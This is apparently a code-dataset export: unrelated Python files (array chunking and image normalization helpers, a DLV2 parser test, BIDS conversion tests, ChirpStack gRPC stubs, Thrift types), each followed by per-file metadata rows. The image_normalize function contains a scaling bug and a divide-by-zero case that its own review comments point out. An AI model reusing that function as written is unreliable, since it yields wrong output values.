def get_pool(z_start, z_end, z_step=1, z_chunk_size=None, fmt='slice'):
    """Partition the z range [z_start, z_end) (stepped by z_step) into chunks.

    Parameters
    ----------
    z_chunk_size : int or None
        Maximum number of z indices per chunk; None means one single chunk
        ('slice' format) or a flat list of indices ('list' format).
    fmt : str
        'list' -> list of index lists; anything else -> list of slice objects.

    Returns
    -------
    list of lists of int, list of int, or list of slice.
    """
    if fmt == 'list':
        z_list = list(range(z_start, z_end, z_step))
        if z_chunk_size is not None:
            # Fix: step by z_chunk_size.  The original stepped i by 1 over
            # range(npool), yielding overlapping chunks (z_list[0:c],
            # z_list[1:1+c], ...) and a spurious extra chunk when the list
            # length was an exact multiple of the chunk size.
            z_pool = [z_list[i:i + z_chunk_size]
                      for i in range(0, len(z_list), z_chunk_size)]
        else:
            z_pool = z_list
    else:
        # Number of z indices actually selected by (z_start, z_end, z_step).
        nz = (z_end - z_start - 1) // z_step + 1
        if z_chunk_size is not None:
            npool = nz // z_chunk_size + bool(nz % z_chunk_size)
            # All full chunks, then a final (possibly short) chunk clipped
            # at z_end.
            z_pool = [slice(z_start + i * z_step * z_chunk_size,
                            z_start + (i + 1) * z_step * z_chunk_size,
                            z_step) for i in range(npool - 1)]
            z_pool += [slice(z_start + (npool - 1) * z_step * z_chunk_size,
                             z_end, z_step)]
        else:
            z_pool = [slice(z_start, z_end, z_step)]
    return z_pool
def image_normalize(data, dtype=int, vmax=255, cutoffmin=None, cutoffmax=None):
    """Clip and rescale an array for image export.

    Values below cutoffmin / above cutoffmax are clipped in place (this
    mutates the caller's array), then the data is min-max rescaled.
    Returns an int array when dtype is int, otherwise the rescaled floats.
    """
    # In-place clipping of outliers before rescaling.
    if cutoffmin is not None:
        data[data<cutoffmin] = cutoffmin
    if cutoffmax is not None:
        data[data>cutoffmax] = cutoffmax
    # Rescale to [0, vmax].  NOTE(review): divides by zero / yields NaN for
    # constant input (max == min) -- confirm callers never pass flat data.
    data = (data - data.min())/(data.max()-data.min())*vmax
    if dtype is int:
        # NOTE(review): data is already scaled to [0, vmax] here, so the
        # extra *(vmax+1) produces values up to vmax*(vmax+1); this looks
        # like it assumed data in [0, 1].  Confirm the intended output range
        # before changing -- the ==(vmax+1) clamp below only catches the
        # single value vmax+1.
        data = np.array(data * (vmax+1), dtype=int)
        data[data==(vmax+1)] = vmax
    return data
| 44.243278
| 147
| 0.57154
| 4,171
| 34,554
| 4.526253
| 0.080796
| 0.041528
| 0.044494
| 0.023412
| 0.880661
| 0.870809
| 0.856295
| 0.840934
| 0.83336
| 0.829281
| 0
| 0.013601
| 0.314841
| 34,554
| 780
| 148
| 44.3
| 0.783823
| 0.198964
| 0
| 0.767892
| 0
| 0.003868
| 0.108716
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023211
| false
| 0
| 0.017408
| 0.001934
| 0.048356
| 0.154739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed1b139dbd9f64a92c438fed584322fc42344fab
| 151
|
py
|
Python
|
tests/parser/grounding.duplicates.1b.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.duplicates.1b.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.duplicates.1b.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
# DLV2 parser regression test: the harness feeds `input` (an ASP program with
# a disjunctive fact and a rule carrying a duplicated comment literal) to the
# parser and compares its serialization against `output` -- identical here,
# i.e. the program must round-trip unchanged.
# NOTE(review): `input` shadows the Python builtin; the test harness
# presumably requires these exact variable names, so leave them as is.
input = """
a | b.
foo(X,Y) :- a, X = Y + 1. %#int(Y), a, X = Y + 1.
"""
output = """
a | b.
foo(X,Y) :- a, X = Y + 1. %#int(Y), a, X = Y + 1.
"""
| 16.777778
| 50
| 0.324503
| 32
| 151
| 1.53125
| 0.28125
| 0.244898
| 0.244898
| 0.326531
| 0.77551
| 0.77551
| 0.77551
| 0.77551
| 0.77551
| 0.77551
| 0
| 0.038835
| 0.317881
| 151
| 8
| 51
| 18.875
| 0.436893
| 0
| 0
| 0.75
| 0
| 0.25
| 0.789116
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
ed53cf6af4b4f371b108767c97b80b3070ac12d0
| 3,043
|
py
|
Python
|
package_test.py
|
Aaronearlerichardson/BIDS_coding
|
78feb08ed8ad6b782cae19591b4df5e8547b99bb
|
[
"MIT"
] | 1
|
2021-04-29T18:05:41.000Z
|
2021-04-29T18:05:41.000Z
|
package_test.py
|
Aaronearlerichardson/BIDS_coding
|
78feb08ed8ad6b782cae19591b4df5e8547b99bb
|
[
"MIT"
] | 19
|
2021-04-29T18:27:49.000Z
|
2022-02-09T20:38:03.000Z
|
package_test.py
|
Aaronearlerichardson/BIDS_coding
|
78feb08ed8ad6b782cae19591b4df5e8547b99bb
|
[
"MIT"
] | 1
|
2021-04-29T23:02:01.000Z
|
2021-04-29T23:02:01.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from BIDS_converter.data2bids import Data2Bids
import shutil
import os
import tarfile
def test_D52():
os.makedirs("Data/Phoneme_Sequencing/BIDS", exist_ok=True)
error = None
files = None
print("Unzipping: D52 201213 COGAN_PHONEMESEQUENCE.edf.tar.xz")
with tarfile.open("Data/Phoneme_Sequencing/eeg_data/D52 201213 COGAN_PHONEMESEQUENCE.edf.tar.xz", mode="r:xz") as f:
f.extractall(path="Data/Phoneme_Sequencing/sourcedata/D52")
try:
Data2Bids(input_dir='Data/Phoneme_Sequencing/sourcedata/D52', output_dir='Data/Phoneme_Sequencing/BIDS',
stim_dir="Data/Phoneme_Sequencing/sourcedata/stimuli", overwrite=True, verbose=True).run()
files = [x for x in os.listdir('Data/Phoneme_Sequencing/BIDS/sub-D0052')]
except Exception as e:
error = e
finally:
while os.path.isdir("Data/Phoneme_Sequencing/BIDS"):
shutil.rmtree("Data/Phoneme_Sequencing/BIDS", ignore_errors=True)
os.chmod("Data/Phoneme_Sequencing/sourcedata/D52/D52 201213 COGAN_PHONEMESEQUENCE.edf", 0o777)
os.remove("Data/Phoneme_Sequencing/sourcedata/D52/D52 201213 COGAN_PHONEMESEQUENCE.edf")
if error:
raise error
else:
return files
def test_D48():
os.makedirs("Data/Phoneme_Sequencing/BIDS", exist_ok=True)
error = None
files = None
print("Unzipping: D48 200906 Cogan_PhonemeSequence_Session1.edf.tar.xz")
with tarfile.open("Data/Phoneme_Sequencing/eeg_data/D48 200906 Cogan_PhonemeSequence_Session1.edf.tar.xz",
mode="r:xz") as f:
f.extractall(path="Data/Phoneme_Sequencing/sourcedata/D48")
print("Unzipping: D48 200908 Cogan_PhonemeSequence_Session2.edf.tar.xz")
with tarfile.open("Data/Phoneme_Sequencing/eeg_data/D48 200908 Cogan_PhonemeSequence_Session2.edf.tar.xz",
mode="r:xz") as f:
f.extractall(path="Data/Phoneme_Sequencing/sourcedata/D48")
try:
Data2Bids(input_dir='Data/Phoneme_Sequencing/sourcedata/D48', output_dir='Data/Phoneme_Sequencing/BIDS',
stim_dir="Data/Phoneme_Sequencing/sourcedata/stimuli", overwrite=True, verbose=True).run()
files = [x for x in os.listdir('Data/Phoneme_Sequencing/BIDS/sub-D0048')]
except Exception as e:
error = e
finally:
while os.path.isdir("Data/Phoneme_Sequencing/BIDS"):
shutil.rmtree("Data/Phoneme_Sequencing/BIDS", ignore_errors=True)
os.chmod("Data/Phoneme_Sequencing/sourcedata/D48/D48 200906 Cogan_PhonemeSequence_Session1.edf", 0o777)
os.chmod("Data/Phoneme_Sequencing/sourcedata/D48/D48 200908 Cogan_PhonemeSequence_Session2.edf", 0o777)
os.remove("Data/Phoneme_Sequencing/sourcedata/D48/D48 200906 Cogan_PhonemeSequence_Session1.edf")
os.remove("Data/Phoneme_Sequencing/sourcedata/D48/D48 200908 Cogan_PhonemeSequence_Session2.edf")
if error:
raise error
else:
return files
| 41.684932
| 120
| 0.703911
| 387
| 3,043
| 5.374677
| 0.21447
| 0.1375
| 0.2625
| 0.19375
| 0.928365
| 0.924038
| 0.924038
| 0.896154
| 0.728365
| 0.728365
| 0
| 0.062954
| 0.185672
| 3,043
| 72
| 121
| 42.263889
| 0.776433
| 0.014131
| 0
| 0.581818
| 0
| 0
| 0.499666
| 0.449633
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036364
| false
| 0
| 0.072727
| 0
| 0.145455
| 0.054545
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ed6fe212a92295eeb08164cb3305a271b2cab6cd
| 619
|
py
|
Python
|
experiments/pipelines/__init__.py
|
DS3Lab/datascope
|
6118cc2ab34d54e9786015d99e93ad31fe02f4a8
|
[
"MIT"
] | 1
|
2022-03-27T15:04:02.000Z
|
2022-03-27T15:04:02.000Z
|
experiments/pipelines/__init__.py
|
Eastsouthern/datascope
|
733c0debb561f9c9478b8fc91afe2f71c62adb6c
|
[
"MIT"
] | null | null | null |
experiments/pipelines/__init__.py
|
Eastsouthern/datascope
|
733c0debb561f9c9478b8fc91afe2f71c62adb6c
|
[
"MIT"
] | 3
|
2022-02-08T17:44:24.000Z
|
2022-03-27T15:03:50.000Z
|
from .base import (
Pipeline,
IdentityPipeline,
StandardScalerPipeline,
LogScalerPipeline,
PcaPipeline,
PcaSvdPipeline,
KMeansPipeline,
GaussBlurPipeline,
HogTransformPipeline,
TfidfPipeline,
ToLowerUrlRemovePipeline,
)
from .models import get_model, ModelType
__all__ = [
"Pipeline",
"IdentityPipeline",
"StandardScalerPipeline",
"LogScalerPipeline",
"PcaPipeline",
"PcaSvdPipeline",
"KMeansPipeline",
"GaussBlurPipeline",
"HogTransformPipeline",
"TfidfPipeline",
"ToLowerUrlRemovePipeline",
"get_model",
"ModelType",
]
| 19.34375
| 40
| 0.686591
| 35
| 619
| 11.971429
| 0.542857
| 0.114558
| 0.21957
| 0.300716
| 0.840095
| 0.840095
| 0.840095
| 0.840095
| 0.840095
| 0.840095
| 0
| 0
| 0.219709
| 619
| 31
| 41
| 19.967742
| 0.867495
| 0
| 0
| 0
| 0
| 0
| 0.313409
| 0.074313
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.068966
| 0
| 0.068966
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9c2fbdec53ba6edc77b521670360c2c1b1546fbd
| 13,156
|
py
|
Python
|
python/src/chirpstack_api/as_pb/external/api/internal_pb2_grpc.py
|
geogerli/chirpstack-api
|
b51eb58055660565fbf186ddd8e6e6a8a7526331
|
[
"MIT"
] | null | null | null |
python/src/chirpstack_api/as_pb/external/api/internal_pb2_grpc.py
|
geogerli/chirpstack-api
|
b51eb58055660565fbf186ddd8e6e6a8a7526331
|
[
"MIT"
] | 1
|
2021-09-02T09:59:35.000Z
|
2021-09-02T09:59:35.000Z
|
python/src/chirpstack_api/as_pb/external/api/internal_pb2_grpc.py
|
iBrick/chirpstack-api
|
b160470d3707dfe317ac5a010124dc82813117fb
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from chirpstack_api.as_pb.external.api import internal_pb2 as chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class InternalServiceStub(object):
"""InternalService is the service providing API endpoints for internal usage.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Login = channel.unary_unary(
'/api.InternalService/Login',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginRequest.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginResponse.FromString,
)
self.Profile = channel.unary_unary(
'/api.InternalService/Profile',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ProfileResponse.FromString,
)
self.Branding = channel.unary_unary(
'/api.InternalService/Branding',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.BrandingResponse.FromString,
)
self.GlobalSearch = channel.unary_unary(
'/api.InternalService/GlobalSearch',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchRequest.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchResponse.FromString,
)
self.CreateAPIKey = channel.unary_unary(
'/api.InternalService/CreateAPIKey',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyRequest.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyResponse.FromString,
)
self.DeleteAPIKey = channel.unary_unary(
'/api.InternalService/DeleteAPIKey',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.DeleteAPIKeyRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.ListAPIKeys = channel.unary_unary(
'/api.InternalService/ListAPIKeys',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysRequest.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysResponse.FromString,
)
class InternalServiceServicer(object):
"""InternalService is the service providing API endpoints for internal usage.
"""
def Login(self, request, context):
"""Log in a user
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Profile(self, request, context):
"""Get the current user's profile
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Branding(self, request, context):
"""Get the branding for the UI
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GlobalSearch(self, request, context):
"""Perform a global search.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateAPIKey(self, request, context):
"""CreateAPIKey creates the given API key.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteAPIKey(self, request, context):
"""DeleteAPIKey deletes the API key.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListAPIKeys(self, request, context):
"""ListAPIKeys lists the available API keys.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_InternalServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Login': grpc.unary_unary_rpc_method_handler(
servicer.Login,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginRequest.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginResponse.SerializeToString,
),
'Profile': grpc.unary_unary_rpc_method_handler(
servicer.Profile,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ProfileResponse.SerializeToString,
),
'Branding': grpc.unary_unary_rpc_method_handler(
servicer.Branding,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.BrandingResponse.SerializeToString,
),
'GlobalSearch': grpc.unary_unary_rpc_method_handler(
servicer.GlobalSearch,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchRequest.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchResponse.SerializeToString,
),
'CreateAPIKey': grpc.unary_unary_rpc_method_handler(
servicer.CreateAPIKey,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyRequest.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyResponse.SerializeToString,
),
'DeleteAPIKey': grpc.unary_unary_rpc_method_handler(
servicer.DeleteAPIKey,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.DeleteAPIKeyRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'ListAPIKeys': grpc.unary_unary_rpc_method_handler(
servicer.ListAPIKeys,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysRequest.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'api.InternalService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class InternalService(object):
"""InternalService is the service providing API endpoints for internal usage.
"""
@staticmethod
def Login(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/Login',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginRequest.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Profile(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/Profile',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ProfileResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Branding(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/Branding',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.BrandingResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GlobalSearch(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/GlobalSearch',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchRequest.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateAPIKey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/CreateAPIKey',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyRequest.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteAPIKey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/DeleteAPIKey',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.DeleteAPIKeyRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListAPIKeys(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/ListAPIKeys',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysRequest.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
| 49.089552
| 145
| 0.699301
| 1,336
| 13,156
| 6.363024
| 0.089072
| 0.047994
| 0.063992
| 0.071992
| 0.838725
| 0.804258
| 0.800965
| 0.769674
| 0.765792
| 0.752264
| 0
| 0.004584
| 0.237154
| 13,156
| 267
| 146
| 49.273408
| 0.842467
| 0.051459
| 0
| 0.513889
| 1
| 0
| 0.067436
| 0.034524
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.013889
| 0.032407
| 0.134259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c661484f448dd02b43afab7e338f4875f03fa76
| 158
|
py
|
Python
|
src/monitoring/adapters/mock/__init__.py
|
gkovacs81/argus_server
|
97ebf705ed3e61a69bd561faf495e2c19bda510d
|
[
"MIT"
] | null | null | null |
src/monitoring/adapters/mock/__init__.py
|
gkovacs81/argus_server
|
97ebf705ed3e61a69bd561faf495e2c19bda510d
|
[
"MIT"
] | 3
|
2021-06-02T04:07:35.000Z
|
2021-12-27T20:21:46.000Z
|
src/monitoring/adapters/mock/__init__.py
|
gkovacs81/argus_server
|
97ebf705ed3e61a69bd561faf495e2c19bda510d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Author: Gábor Kovács
# @Date: 2021-02-25 20:10:01
# @Last Modified by: Gábor Kovács
# @Last Modified time: 2021-02-25 20:10:02
| 26.333333
| 42
| 0.632911
| 27
| 158
| 3.703704
| 0.62963
| 0.22
| 0.16
| 0.2
| 0.24
| 0
| 0
| 0
| 0
| 0
| 0
| 0.224806
| 0.183544
| 158
| 5
| 43
| 31.6
| 0.550388
| 0.93038
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c7663f94347294febddacdb369471056e7bd4ea
| 27,135
|
py
|
Python
|
skywalker/ttypes.py
|
iPlantCollaborativeOpenSource/skywalker-python
|
6ef2f98541d054a8c62df5b36eb307c0954f7805
|
[
"BSD-3-Clause"
] | null | null | null |
skywalker/ttypes.py
|
iPlantCollaborativeOpenSource/skywalker-python
|
6ef2f98541d054a8c62df5b36eb307c0954f7805
|
[
"BSD-3-Clause"
] | null | null | null |
skywalker/ttypes.py
|
iPlantCollaborativeOpenSource/skywalker-python
|
6ef2f98541d054a8c62df5b36eb307c0954f7805
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:new_style,utf8strings
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Provider(object):
"""
Attributes:
- uuid
- name
- hash
- options
- time
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'uuid', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
(3, TType.STRING, 'hash', None, None, ), # 3
(4, TType.MAP, 'options', (TType.STRING,None,TType.STRING,None), None, ), # 4
(5, TType.I32, 'time', None, None, ), # 5
)
def __init__(self, uuid=None, name=None, hash=None, options=None, time=None,):
self.uuid = uuid
self.name = name
self.hash = hash
self.options = options
self.time = time
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.uuid = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.options = {}
(_ktype1, _vtype2, _size0 ) = iprot.readMapBegin()
for _i4 in xrange(_size0):
_key5 = iprot.readString().decode('utf-8')
_val6 = iprot.readString().decode('utf-8')
self.options[_key5] = _val6
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.time = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Provider')
if self.uuid is not None:
oprot.writeFieldBegin('uuid', TType.STRING, 1)
oprot.writeString(self.uuid.encode('utf-8'))
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name.encode('utf-8'))
oprot.writeFieldEnd()
if self.hash is not None:
oprot.writeFieldBegin('hash', TType.STRING, 3)
oprot.writeString(self.hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.MAP, 4)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.options))
for kiter7,viter8 in self.options.items():
oprot.writeString(kiter7.encode('utf-8'))
oprot.writeString(viter8.encode('utf-8'))
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.time is not None:
oprot.writeFieldBegin('time', TType.I32, 5)
oprot.writeI32(self.time)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.uuid is None:
raise TProtocol.TProtocolException(message='Required field uuid is unset!')
if self.options is None:
raise TProtocol.TProtocolException(message='Required field options is unset!')
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.uuid)
value = (value * 31) ^ hash(self.name)
value = (value * 31) ^ hash(self.hash)
value = (value * 31) ^ hash(self.options)
value = (value * 31) ^ hash(self.time)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Identity(object):
"""
Attributes:
- uuid
- name
- hash
- options
- time
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'uuid', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
(3, TType.STRING, 'hash', None, None, ), # 3
(4, TType.MAP, 'options', (TType.STRING,None,TType.STRING,None), None, ), # 4
(5, TType.I32, 'time', None, None, ), # 5
)
def __init__(self, uuid=None, name=None, hash=None, options=None, time=None,):
self.uuid = uuid
self.name = name
self.hash = hash
self.options = options
self.time = time
def read(self, iprot):
